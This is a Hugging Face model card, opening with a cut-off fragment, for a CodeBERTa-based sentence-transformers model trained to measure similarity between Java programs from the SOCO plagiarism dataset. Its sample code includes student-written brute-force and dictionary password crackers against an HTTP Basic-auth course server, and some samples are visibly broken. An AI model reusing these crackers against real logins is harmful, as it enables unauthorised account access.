\ strLine;\n int intWordLength;\n\n int intCountOfOneLetterWords =\
\ -1;\n int intCountOfTwoLetterWords = -1;\n int intCountOfThreeLetterWords\
\ = -1;\n\n\n\n try\n { \n \n \n \n \
\ \n \n reader = new FileReader(TextFileName);\n\n \
\ \n \n \n \n inTextFile = new\
\ BufferedReader(reader);\n\n\n strLine = inTextFile.readLine();\n\n\n\
\ while (strLine != null)\n {\n\n strLine = strLine.trim();\n\
\ intWordLength = strLine.length();\n\n\n \n \
\ \n if (intWordLength == 1)\n {\n intCountOfOneLetterWords++;\n\
\ strOneLetterWords[intCountOfOneLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength\
\ == 2) \n {\n\n intCountOfTwoLetterWords++;\n \
\ strTwoLetterWords[intCountOfTwoLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength ==\
\ 3)\n {\n intCountOfThreeLetterWords++;\n \
\ strThreeLetterWords[intCountOfThreeLetterWords] = strLine;\n \
\ }\n\n strLine = inTextFile.readLine();\n\n }\n\n }\n\
\n catch(FileNotFoundException e)\n {\n\n \n \n\
\ System.out.println();\n System.out.println(\"The file '\" +\
\ TextFileName + \"' cannot found.\");\n System.out.println();\n\n \
\ }\n\n catch(Exception e)\n {\n System.out.println(\"Exception\
\ thrown....\");\n System.err.println(e);\n }\n\n finally\n\
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static\
\ boolean passwordWasFound(String urlString,\n \
\ String password,\n boolean retVal)\n \
\ \n {\n\n String strEncodeInput = username + \":\" + password;\n \
\ boolean returnValue = retVal;\n boolean boolExceptionThrown = false;\n\n\
\n\n try\n {\n\n strLastPasswordTested = password;\n \n \
\ intNumberOfConnectionAttempts++;\n\n url = new URL(urlString);\n\
\n String encoding = new url.misc.BASE64Encoder().encode (strEncodeInput.getBytes());\n\
\n\n System.out.print(\"username = \" + \n username\
\ + \n \" \" +\n \
\ \"password = \" +\n password);\n\n\n\n HttpURLConnection\
\ urlConnection = (HttpURLConnection)url.openConnection();\n\n urlConnection.setRequestProperty(\"\
Authorization\", \n \" \" + encoding);\
\ \n\n System.out.println(\" response = \" + urlConnection.getResponseCode());\n\
\n if (urlConnection.getResponseCode() == 401)\n {\n \
\ returnValue = false; \n }\n\n }\n\n catch (MalformedURLException\
\ m)\n {\n boolExceptionThrown = true;\n returnValue = false;\n\
\n System.err.println(m);\n System.out.println(\"Malformed URL\
\ Exception error\");\n }\n\n catch (IOException io)\n {\n \
\ boolExceptionThrown = true;\n returnValue = false;\n\n System.out.println(\"\
IOException error\");\n System.err.println(io); \n }\n\n catch\
\ (Exception e)\n {\n boolExceptionThrown = true;\n returnValue\
\ = false;\n\n System.out.println(\"General exception.....\");\n \
\ System.err.println(e); \n }\n\n finally\n { \n urlConnection\
\ = null;\n url = null; \n }\n\n\n if (boolExceptionThrown)\n\
\ {\n intExceptionCount++;\n strExceptionPassword[intExceptionCount]\
\ = password;\n }\n\n\n return returnValue;\n\n }\n\n}"
- "import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\n\
public class WatchDog {\n\n public WatchDog() {\n\n }\n public static void\
\ main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println(\"\
ishti\");\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff\
\ = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n \
\ String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\
\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n\
\ System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n\
\ Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n\
\ newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n\
\ if (newin.readLine() != null){\n System.out.println(\"\
Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n \
\ Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n \
\ }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n\
\ }\n\n }\n\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs16-lr2e-05-split0.1")
# Run inference
sentences = [
'import java.net.*;\nimport java.io.*;\n\npublic class BruteForce {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n \n public BruteForce(String strURL,String strUserName) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n }\n \n public String getPassword(){\n URL u;\n String result ="";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce BF = new BruteForce(arg[0],arg[1]);\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n \n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME>");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[] password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n if (password[i] == 90) {\n password[i] = 97;\n }\n if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n }\n }\n }\n catch (RuntimeException re){\n throw new PasswordFailureException ();\n }\n return new String(password);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private String strUserName;\n private String strURL;\n private String strDictPath;\n private int iAttempts;\n\n \n public Dictionary(String strURL,String strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n }\n \n\n public String getPassword(){\n URL u;\n String result ="";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME> <Dictionary path>");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n try {\n {\n line = inputFile.readLine();\n }while (line.length() != iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println("ishti");\n\n System.out.println("Downloading first copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");\n String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};\n String[] cmdMail = {"//sh", "-c", "mailx -s \\"Diffrence\\" \\"@cs.rmit.edu.\\" < Diff.txt"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println("Downloading new copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( "Diff.txt"));\n if (newin.readLine() != null){\n System.out.println("Sending Mail");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec("cp newfile.html oldfile.html");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.9429, -0.0890],
# [ 0.9429, 1.0000, -0.0692],
# [-0.0890, -0.0692, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 38,664 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 466.15 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.06 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 454.38 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br><br><br><br><br><br><br><br>import java.io.*;<br>import java.net.*;<br>import javax.swing.Timer;<br>import java.awt.event.*;<br>import javax.swing.JOptionPane;<br><br>public class WatchDog <br>{<br> private static Process pro = null;<br> private static Runtime run = Runtime.getRuntime();<br> <br> public static void main(String[] args) <br> {<br> String cmd = null;<br> try<br> {<br> cmd = new String("wget -O original.txt http://www.cs.rmit.edu./students/");<br><br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> }<br> catch (IOException e)<br> {<br> }<br> <br> class Watch implements ActionListener<br> {<br> BufferedReader in = null;<br> String str = null;<br> Socket socket;<br> public void actionPerformed (ActionEvent event)<br> {<br> <br> try<br> {<br> System.out.println("in Watch!");<br> String cmd = new String();<br> int ERROR = 1;<br> cmd = new String("wget -O new.txt http://www.cs.rmit.edu./students/");<br><br><br> System.out.println(cmd);<br> cmd = new String("diff original.txt new.txt");<br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> in = new Buf...</code> |
| <code><br>import java.net.*; <br>import java.io.*; <br>public class BruteForce {<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Error: Correct Format Filename, username e.g<>"); <br> System.exit(1); <br> }<br> BruteForce bruteForce1 = new BruteForce();<br> Result=bruteForce1.Password("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("The Password of "+args[0]+"is.."+Result); <br> <br> }<br><br><br><br> private String Password(String urlString,String username) <br> { <br> int cnt=0;<br> <br> t0 = System.currentTimeMillis(); <br> for ( char ch = 'A'; ch <= 'z'; ch++ )<br> { <br> if (ch>'Z' && ch<'a')<br> { <br> ch='a'; <br> } <br> <br> for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )<br> { <br> <br> if (ch1>'Z' && ch1<'a')<br> { <br> ch1='a'; <br> }<br><br><br> for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )<br> { <br> if (ch2>'Z' && ch2<'a')<br> { <br> ...</code> | <code><br><br>import java.net.*; <br>import java.io.*; <br>import java.util.Date; <br>public class Dictionary{<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Correct Format Filename username e.g<>"); <br> System.exit(1); <br> }<br> <br> Dictionary dicton1 = new Dictionary();<br> Result=dicton1.Dict("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("Cracked Password for The User "+args[0]+" The Password is.."+Result); <br> <br><br> <br> <br> }<br><br><br><br> private String Dict(String urlString,String username) <br> { <br> int cnt=0;<br> FileInputStream stream=null;<br> DataInputStream word=null;<br><br> try{ <br> stream = new FileInputStream ("/usr/share/lib/dict/words"); <br><br> word =new DataInputStream(stream);<br> t0 = System.currentTimeMillis(); <br> while (word.available() !=0) <br> {<br> <br> password=word.readLine();<br> if (password.length()!=3)<br> {<br> continue;<br> }<br> System.out.print("...</code> | <code><br>package java.httputils;<br><br>import java.io.IOException;<br>import java.net.MalformedURLException;<br>import java.util.ArrayList;<br>import java.util.Iterator;<br><br><br>public class RunnableHttpRequest extends Thread<br>{<br> protected String targetURL = "http://localhost:8080/";<br> protected int requestCount = 1;<br> protected ArrayList timingList = new ArrayList();<br> protected HttpRequestClient req;<br> Boolean finished = new Boolean(false);<br> HttpRequestThreadPool pool;<br><br> <br> public void run()<br> {<br> try<br> {<br> for (int i = 0; i < getRequestCount() && !getFinished().booleanValue(); i++)<br> {<br> try<br> {<br> req =<br> new HttpRequestClient(getTargetURL());<br><br> <br> }<br> catch (MalformedURLException e)<br> {<br> e.printStackTrace();<br> break;<br> }<br> catch (IOException e)<br> {<br> ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 4,296 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
